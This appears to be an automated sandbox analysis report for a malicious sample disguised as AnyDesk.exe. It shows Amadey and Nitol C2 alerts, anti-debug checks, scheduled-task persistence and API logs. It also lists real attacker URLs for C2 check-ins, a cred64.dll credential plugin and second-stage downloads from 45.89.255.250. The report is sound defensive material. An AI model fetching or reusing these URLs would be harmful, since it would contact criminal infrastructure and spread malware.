Summary | ZeroBOX

AnyDesk.exe

NPKI Emotet Generic Malware ASPack Antivirus Malicious Packer UPX Malicious Library PWS Socket AntiDebug JPEG Format PE64 DLL OS Processor Check PE32 PE File .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 12, 2022, 11:13 a.m. Dec. 12, 2022, 11:15 a.m.
Size 307.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d332cf184ac8335d2c3581a48ee0ad87
SHA256 d7e5fa6922a95dfb84d870acd40632bde2c667d90f4c6e632342f03bab338fb2
CRC32 62E5FCBF
ssdeep 6144:6zUx+CLxZyLMZ58dt/AlbTX61DESFCYWZOmCRm1cp4SY:6DAZyrdtoJK1DE0dWtCQeA
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49172 -> 45.89.255.254:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.89.255.250:8080 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49178 -> 45.89.255.250:8080 2016700 ET HUNTING Suspicious explorer.exe in URI Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49178 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49191 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.89.255.250:8080 -> 192.168.56.103:49191 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49191 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49191 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 45.89.255.254:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.254:80 -> 192.168.56.103:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 45.89.255.250:40404 2025135 ET MALWARE [PTsecurity] Botnet Nitol.B Checkin Malware Command and Control Activity Detected
TCP 192.168.56.103:49186 -> 45.89.255.250:8080 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 45.89.255.250:8080 -> 192.168.56.103:49186 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.89.255.250:8080 -> 192.168.56.103:49186 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 45.89.255.250:8080 -> 192.168.56.103:49186 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49188 -> 45.89.255.250:50505 2014600 ET MALWARE Win32/Nitol.A Checkin Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\4ca685c424\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006039d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603798
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006040d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00604218
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00603dd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006042d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00604358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00604358
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .itext
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/TeamViewerSetupx64.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/explorer.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/TeamViewer_Desktop.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://45.89.255.250:8080/LanguageTool.exe
suspicious_features GET method with no useragent header suspicious_request GET http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/Plugins/cred64.dll
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php?scr=1
request GET http://45.89.255.250:8080/TeamViewerSetupx64.exe
request GET http://45.89.255.250:8080/explorer.exe
request GET http://45.89.255.250:8080/TeamViewer_Desktop.exe
request GET http://45.89.255.250:8080/LanguageTool.exe
request GET http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/Plugins/cred64.dll
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php
request POST http://SmgqNt3EIxXkSAsU.xyz/jg94cVd30f/index.php?scr=1
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00380000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e71000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e72000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00460000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00415000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00417000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0040a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00407000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00406000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d53000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d54000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d55000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d56000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d57000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d58000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d59000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00d5f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04881000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04882000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04883000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04884000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04885000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04886000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04887000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04888000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04889000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
